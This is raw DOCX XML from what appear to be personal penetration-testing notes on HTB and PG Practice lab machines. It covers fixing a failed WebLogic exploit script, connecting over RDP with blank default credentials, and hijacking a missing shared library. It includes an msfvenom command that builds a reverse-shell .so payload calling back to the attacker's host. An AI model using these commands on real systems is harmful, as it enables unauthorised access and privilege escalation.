    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 269, in upload_jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    jar = {'theFile':(jarname,open(jarname, 'rb'))}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                              ~~~~^^^^^^^^^^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003580">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileNotFoundError: [Errno 2] No such file or directory: 'weblogic.jar'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003581">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003582">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003583">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What happened?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003584">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003585">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit failed because the malicious weblogic.jar file was never created. This was caused by a Java compilation error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003586">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error: release version 7 not supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003587">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003588">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This error occurred during the javac --release 7 compilation step, which is used in this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdCompile = "javac --release 7 " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">process = subprocess.call(cmdCompile,shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the compilation failed, the .class file was never created, which means jar couldn't package the .class file into weblogic.jar. As a result, when the script tried to upload weblogic.jar, the file simply didn't exist, leading to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileNotFoundError: [Errno 2] No such file or directory: 'weblogic.jar'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So to fix it, just delete "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--release 7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003590">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdCompile = "javac --release 7 " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003591">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmdCompile = "javac " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003592">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003593">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003594">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But the exploit didn't seem to work, although it did run. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003595">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003596">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003599">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yusaeut9tha5" w:id="477"/>
      <w:bookmarkEnd w:id="477"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To connect to RDP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp  /u:[username] /p:[password /v:10.129.233.54</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can not include the /u: or /p:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Especially the /p: if you want to leave password blank</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some default credentials that worked in HTB are administrator:[no password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A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A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7nnlwwxzvhw8" w:id="478"/>
      <w:bookmarkEnd w:id="478"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating malicious .so files for rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple times, we've seen cases where a binary tries to load a .so file that doesn't exist, so we add our own malicious .so file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section in cron jobs displays multiple ways to create malicious .so files, both manually and using a one-liner from msf venom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1142">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the msfvenom one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lrw6gtha03cv" w:id="479"/>
      <w:bookmarkEnd w:id="479"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1143">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Workaholic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we used "strings" to analyze a binary we can run as SUID, and it was trying to load </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/ted/.lib/libsecurity.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specifically the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">init_plugin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" function</w:t>
      </w:r>
    </w:p>
